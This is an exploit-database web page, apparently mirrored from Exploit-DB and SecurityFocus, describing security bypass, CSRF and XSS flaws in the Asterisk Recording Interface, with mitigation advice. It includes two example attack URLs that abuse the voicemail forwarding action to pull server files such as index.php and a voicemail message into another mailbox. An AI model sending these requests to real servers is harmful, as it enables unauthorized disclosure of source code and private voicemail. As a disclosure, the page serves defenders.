Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
Asterisk Recording Interface Multiple Vulnerabilities - exploit.company
header-logo
Suggest Exploit
vendor:
Asterisk Recording Interface
by:
7.5
CVSS
HIGH
Security Bypass, Cross-Site Request Forgery, Cross-Site Scripting
287, 352, 79
CWE
Product Name: Asterisk Recording Interface
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

Asterisk Recording Interface Multiple Vulnerabilities

Attackers can exploit these vulnerabilities to steal authentication credentials, gain unauthorized access, bypass security restrictions, disclose sensitive information, or cause denial-of-service conditions.

Mitigation:

Apply the latest patches and updates from the vendor. Implement proper input validation and output encoding to prevent XSS attacks. Implement CSRF protection mechanisms.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/41571/info

The Asterisk Recording Interface is prone to the following issues:

1. Multiple security bypass vulnerabilities.
2. A cross-site request-forgery vulnerability.
3. A cross-site scripting vulnerability.

Attackers can exploit these issues to steal cookie-based authentication credentials, gain unauthorized access to the application, bypass certain security restrictions, disclose sensitive information, or cause denial-of-service conditions. 

The following example URIs are available:

http://www.example.com/recordings/index.php?m=Voicemail&f=msgAction&a=forward_to&q=&folder=&start=0&span=15&order=calldate&sort=desc&folder_rx=&mailbox_rx=houston%2F2627&selected7=/var/www/recordings/index.php

http://www.example.com/recordings/index.php?m=Voicemail&f=msgAction&a=forward_to&q=&folder=INBOX&start=0&span=15&order=calldate&sort=desc&folder_rx=&mailbox_rx=houston%2F4949&selected7=%2Fvar%2Fspool%2Fasterisk%2Fvoicemail%2Fhouston%2F2625%2FINBOX%2Fmsg0000.txt